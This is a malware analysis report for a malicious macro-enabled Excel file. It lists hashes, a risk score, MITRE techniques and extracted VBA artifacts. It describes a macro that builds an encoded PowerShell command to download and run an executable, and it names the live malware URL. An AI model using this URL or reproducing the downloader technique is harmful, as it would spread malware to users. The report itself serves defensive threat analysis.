Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 8aa3e1396cd5802e…

MALICIOUS

Office (OOXML) / .XLSM

363.9 KB Created: 2021-08-19 14:03:52 UTC Authoring application: Microsoft Excel 15.0300
MD5: 998da072875302919b2819e018eacf6f SHA-1: 4bcb248983c0a37842cfae2bb13dcd1e6bc98c87 SHA-256: 8aa3e1396cd5802e840d87a5a0b370e28102cbe41669124981aa3d38738099a7
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1204.002 Malicious File

The VBA macro within this XLSM file utilizes the Shell() function to execute a PowerShell command. This command is constructed by concatenating multiple strings to form a base64 encoded payload. The reconstructed command attempts to download and execute a file from 'http://3.64.251.139/v3/2/7aa362103110.exe' using PowerShell, indicating a downloader or droppers functionality.

Heuristics 2

  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • VBA project inside OOXML medium OOXML_VBA
    Document contains vbaProject.bin — VBA macros present

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
6c28e1d8e4c3c5b69511d454acc96870192150731ea55be6b2293e62e61866fe		 vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 2633 bytes
vbaProject_00.bin
fca1179e472a2996fad69d8e2a3f04957c05c40c299334562d42086e8ce74e58		 vba-project OOXML VBA project: xl/vbaProject.bin 6144 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.